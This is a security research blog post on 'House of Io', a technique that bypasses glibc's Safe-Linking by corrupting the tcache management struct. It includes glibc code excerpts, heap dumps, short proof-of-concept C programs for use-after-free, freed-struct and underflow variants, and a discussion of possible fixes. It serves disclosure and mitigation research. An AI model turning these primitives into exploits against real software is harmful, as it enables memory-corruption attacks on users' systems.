House of Io – Remastered

A few days ago, I (Awarau) published a blog post (link) with my analysis of the new heap mitigation, Safe-Linking, that will be introduced in GLibc 2.32. The blog post describes the mechanism, alongside an initial guide of how attackers could potentially bypass this mechanism by targeting directly the main tcache metadata that is pointed to from free()d allocations that were inserted into a tcache list.

After publishing this blog post on /r/netsec, it started a thread with @EyalItkin, the researcher that designed “Safe-Linking” and integrated it into GLibc. During our discussion, we were able to develop my initial attack into an exploit that will enable attackers to bypass “Safe-Linking”, and directly attack the tcache management mechanism. In this blog post, co-authored by Eyal, we will describe our new attack plan.

Safe-Linking

Safe-Linking is a security mitigation that was designed to protect the singly-linked lists of buffers that are used in popular malloc() implementations. This mitigation was integrated into both uClibc-NG, and GLibc, and will be shipped in GLibc version 2.32 in August 2020. The mitigation, that is fully described here, protects the next / fd pointers of the tcache / fast-bins free lists, by masking the pointer with a computation that is based on the (heap) address in which the pointer is being stored.

The code version:

#define PROTECT_PTR(pos, ptr, type)  \

       ((type)((((size_t)pos) >> PAGE_SHIFT) ^ ((size_t)ptr)))

#define REVEAL_PTR(pos, ptr, type)   \

       PROTECT_PTR(pos, ptr, type)

This way, the random bits from the address (randomised by the ASLR) are placed on top of the LSB of the stored protected pointer, as can be seen in this figure from the original blog post:

Before this mitigation, attackers were able to gain a Malloc-Where exploit primitive by corrupting a free-list pointer and pointing it at an arbitrary address. Safe-Linking was designed so to block this kind of attack, by forcing an attacker to have an additional heap-ptr-leak primitive in order to be able to properly craft a masked pointer to the chosen arbitrary address.

TCache design – glibc

The tcache (Thread-Cache) is a relatively new addition to GLibc, that provides each thread with an array of short free-lists of various small sizes. This per-thread cache of commonly used buffers, removes the need to lock the heap when allocating / releasing the buffers that can be stored in it, thus improving the overall performance. Here is the code snippet of the initialisation method of the tcache (tcache_perthread_struct):

tcache_init(void)
{
  mstate ar_ptr;
  void *victim = 0;
  const size_t bytes = sizeof (tcache_perthread_struct);

  if (tcache_shutting_down)
    return;

  arena_get (ar_ptr, bytes)
  victim = _int_malloc (ar_ptr, bytes);

  if (!victim && ar_ptr != NULL)
  {

      ar_ptr = arena_get_retry (ar_ptr, bytes);
      victim = _int_malloc (ar_ptr, bytes);
  }


  if (ar_ptr != NULL)
    __libc_lock_unlock (ar_ptr->mutex);


  /* In a low memory situation, we may not be able to allocate memory
     - in which case, we just keep trying later.  However, we
     typically do this very early, so either there is sufficient
     memory, or there isn't enough memory to do non-trivial
     allocations anyway.  */

  if (victim)
  {

      tcache = (tcache_perthread_struct *) victim;
      memset (tcache, 0, sizeof (tcache_perthread_struct));

  }
}

And the allocated tcache_perthread_struct is as follows:

/* We overlay this structure on the user-data portion of a chunk when
   the chunk is stored in the per-thread cache.  */

typedef struct tcache_entry
{
  struct tcache_entry *next;

  /* This field exists to detect double frees.  */
  struct tcache_perthread_struct *key;

} tcache_entry;


/* There is one of these for each thread, which contains the
   per-thread cache (hence "tcache_perthread_struct").  Keeping
   overall size low is mildly important.  Note that COUNTS and ENTRIES
   are redundant (we could have just counted the linked list each
   time), this is for performance reasons.  */

typedef struct tcache_perthread_struct
{
  uint16_t counts[TCACHE_MAX_BINS];
  tcache_entry *entries[TCACHE_MAX_BINS];

} tcache_perthread_struct;

What does it all mean? Well, it means that the TLS (thread-specific variables) stores a pointer to the tcache_perthread_struct, which in turn is stored on the heap using a plain call to _int_malloc(). Here we can see the memory dump after allocating a single small buffer and free()ing it so it would be added to the tcache:

Chunk(addr=0x555555559010, size=0x290, flags=PREV_INUSE)
[0x0000555555559010 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 …………….]

Chunk(addr=0x5555555592a0, size=0x30, flags=PREV_INUSE)
[0x00005555555592a0 00 00 00 00 00 00 00 00 10 90 55 55 55 55 00 00 ……….UUUU..]

From a security perspective, mixing data and meta-data is risky, as this was the original design flaw attackers used to corrupt the free-list structure in the first place. Hence, from a security perspective, storing the entire management meta-data of the tcache in the heap doesn’t look like a very good design decision.

Attack Plan – Safe-Linking Bypass

As is described in Safe-Linking’s thread model, the mitigation aims to protect against attackers with the following exploit primitives:

    • Controlled linear buffer overflow / underflow over a heap buffer.
    • Relative Arbitrary-Write over a heap buffer.

In addition, the mitigation masks the next pointers using the heap address in which they are stored. This means that the head of each free-list is not protected, as in the fast-bins for instance it is stored in libc’s global variables, and anyway it is implementation dependent. As we can’t know for sure that masking the pointer with the address in which it is stored will be effective (implementation dependent), and thinking that the head is stored far away from the risky heap, it seemed redundant to store this pointer in a masked form.

This combination of a non-robust design choice on the part of GLibc, and a false assumption on my part (Eyal) when designing Safe-Linking, led to our simple bypass plan. We are going to attack directly the head of the tcache’s free-list.

Seeing that the tcache_perthread_struct object is allocated when the heap is created, it will be stored right at the heap’s beginning (at a relatively low memory address). Any attacker with a controlled linear buffer underflow over a heap buffer, or a relative Arbitrary-Write (capable of using a negative relative offset/index), will be able to leverage it into corrupting the entire structure of the tcache_perthread_struct. And more specifically, our attacker will be able to corrupt whichever tcache_entry bin they wish.

Additionally, there are two other edge cases which could be exploited by an attacker. These could be considered a subset of a relative Arbitrary-Write.

a) A Use-After-Free (UAF) dereference & write on a struct pointer entry at an offset of 8 bytes – will dereference the key field, pointing at the tcache_perthread_struct object, and later on write on top of the management struct.

b) A badly ordered set of calls to free(), such that a struct is free()d first and then the pointer from a) is free()d. This places the tcache_perthread_struct on the tcache linked list corresponding to size 0x290.

We will now demonstrate the variants of House of Io

UAF

unsigned long victim = 1;

typedef struct hi {
        char *a;
        char *b;
};

int main() 

{

        long int *a, *b, *z;
        struct hi *ptr = malloc(sizeof(ptr));


        ptr->a = malloc(10);
        ptr->b = malloc(10);
        free(ptr);

        //This is a UAF on a struct entry
        a = ptr->b;

        //set the count to n > 1
        *a = 2;

        //get a pointer to target tc_idx
        //this is deterministic because tcache 
        //metadata chunk is an instance of its type. 
        z = (char *)a + 0x80;

        //set the list head to victim 
        //we could also spray this address  
        *z = &victim; 

        //get the victim
        b = malloc(0x15);

        //set value at victim 
        *b = 2; 

        printf("%d\n", victim);
        return 0;
}

After free(ptr) is called, the address of the tcache_perthread_struct is initialised at the key field which overlays  ptr->b

0x5555555592a0: 0x0000000000000000      0x0000555555559010
0x5555555592b0: 0x0000000000000000      0x0000000000000021
0x5555555592c0: 0x0000000000000000      0x0000000000000000
0x5555555592d0: 0x0000000000000000      0x0000000000000021
0x5555555592e0: 0x0000000000000000      0x0000000000000000
0x5555555592f0: 0x0000000000000000      0x0000000000020d11

If an attacker is able to dereference and write to ptr->b after free(ptr) they can corrupt the management struct by placing their target address (0x0000555555558010) at the head of a target list:

0x555555559010: 0x0000000000000002      0x0000000000000000
0x555555559020: 0x0000000000000000      0x0000000000000000
0x555555559030: 0x0000000000000000      0x0000000000000000
0x555555559040: 0x0000000000000000      0x0000000000000000
0x555555559050: 0x0000000000000000      0x0000000000000000
0x555555559060: 0x0000000000000000      0x0000000000000000
0x555555559070: 0x0000000000000000      0x0000000000000000
0x555555559080: 0x0000000000000000      0x0000000000000000
0x555555559090: 0x0000555555558010      0x0000000000000000

Free Management Struct

        [...] 

        long int *a, *b, *z;
        struct hi *ptr = malloc(sizeof(ptr));

        ptr->a = malloc(10);
        ptr->b = malloc(10);


        free(ptr);
        free(ptr->a);
        free(ptr->b);

        a = malloc(0x285);

        [...] 

In this example the address of  tcache_perthread_struct is passed to free() and placed on the tcache bin array at index 39 (for chunks near size 0x290):

Tcachebins[idx=0, size=0x20] count=0  ←  Chunk(addr=0x5555555592a0, size=0x20, flags=PREV_INUSE) 

Tcachebins[idx=39, size=0x290] count=1  ←  Chunk(addr=0x555555559010, size=0x290, flags=PREV_INUSE) 

It is then possible to get the tcache_perthread_struct returned by a subsequent call to malloc() as we can see with a = malloc(0x285);  in the above demonstration: 

gef➤  p a 
$1 = (long *) 0x555555559010

This may then allow an attacker to corrupt the head of a tcache list. However, due to the size constraints of the subsequent call to malloc() this is evidently less likely to be exploitable compared to a buffer underflow or a UAF. 

Underflow

        [...] 

        long int *a, *b, *c, *z;

        a = malloc(20);
        b = malloc(0x3a0 - 0x10); 

        free(b);

        //underflow at arbitrary negative offset
        c = (a - 10);

        //corruption of last tcache entry
        *c = &victim; 

        z = malloc(0x3a0 - 0x10);

        //arbitrary-write operation
        *z = 2;

        [...] 

In this example, an attacker has corrupted the tcache_perthread_struct by underflowing from an adjacent heap buffer with a negative index. Here, that is (a - 10). But an attacker could adjust this negative index to attack different tcache lists, program logic permitting. 

As demonstrated, an attacker with the same capabilities that Safe-Linking was designed to protect against, will be able to bypass the protection, and directly attack the main management structure of the tcache, thus still gaining a Malloc-Where exploit primitive. In summary, if an attacker can target the head of a tcache list directly then it may be possible to bypass the randomisation which protects next / fd  pointers. 

Possible Fix – Pros and Cons

When analysing the attack, we can see 3 main limitations:

    • The attack works against the tcache, and still can’t bypass the fast-bins protection.
    • The attack only works on GLibc, as uClibc-NG (at this point) doesn’t have a tcache in place.
    • The attack demands that the attacker has an underflow primitive, a use-after-free at a specific offset from the beginning of a struct, or a primitive which allows the attacker to place the tcache_perthread_struct on a tcache linked list. 

The last point is the crucial one. Statistically speaking (at least from our experience), an underflow is by far less common than a plain overflow vulnerability. Additionally, to make the free() variants of this attack useful in the real world there are corner cases which need to be fulfilled – such as a UAF on a pointer field at an offset of 8 bytes within a struct, a badly ordered set of calls to free() on a struct, or through some other means by which to call  free() on a pointer to the  tcache_perthread_struct.

One possible fix is to update the tcache’s design so as to move the entire tcache_perthread_struct struct to the per-thread storage (instead of storing there only the pointer to the object, as is done today). However, such a design change will have a non-trivial impact on the memory usage, as the struct is quite big, and most probably will be changed in future versions to include more/less fields.

Another possible solution is to mask the stored pointers in the tcache entries array. Such a change will mean that now the protection will depend on the location of the metadata object. If, in the future, it will be moved, it isn’t very likely that the maintainers will remember to remove / update accordingly this mask (which depends on the whereabouts of the struct). In addition, such a change isn’t required for the fast-bins, and having a different design for each free-list type will be harder to understand and maintain, and might have more downsides than the benefit it will give us.

Weighting all of these into consideration, my (Eyal) personal recommendation (being the one that introduced Safe-Linking and worked with the maintainers of GLibc to integrate it), is to leave it as-is. It will be a known gap in Safe-Linking’s protection, and will be a bypass that might be exploited by attackers. Taking into consideration the primitives needed to exploit this remaining flaw, and as far as it is hard to admit it, I accept this remaining gap.

There isn’t any “perfect” security mitigation, and flaws are to be expected. In our case, we just outlined one such flaw in “Safe-Linking”, and this find should be fully credited to Awarau (@Awarau1) for the initial bypass idea and proof-of-concept he referred to in his original blog post.

Thanks for letting me co-author this blog post, and kudos on the bypass plan.

6 thoughts on “House of Io – Remastered”

  1. But in practice the attacker is hard to override and corrupt TPS with underflow/arbitrary negative-offset write right? unless it’s like CTF, little heap space is used and attacker know TPS is off by few bytes.

    Like

    1. Yes you’re right. However, these techniques (UAF, free management struct, underflow) detail primitives which an attacker could use where target program logic permits. It’s a generalisation above specific cases of exploitation. I personally think the UAF on a struct entry would be the most common in the wild.

      Like

Leave a reply to Jayden Kaio Awarau Cancel reply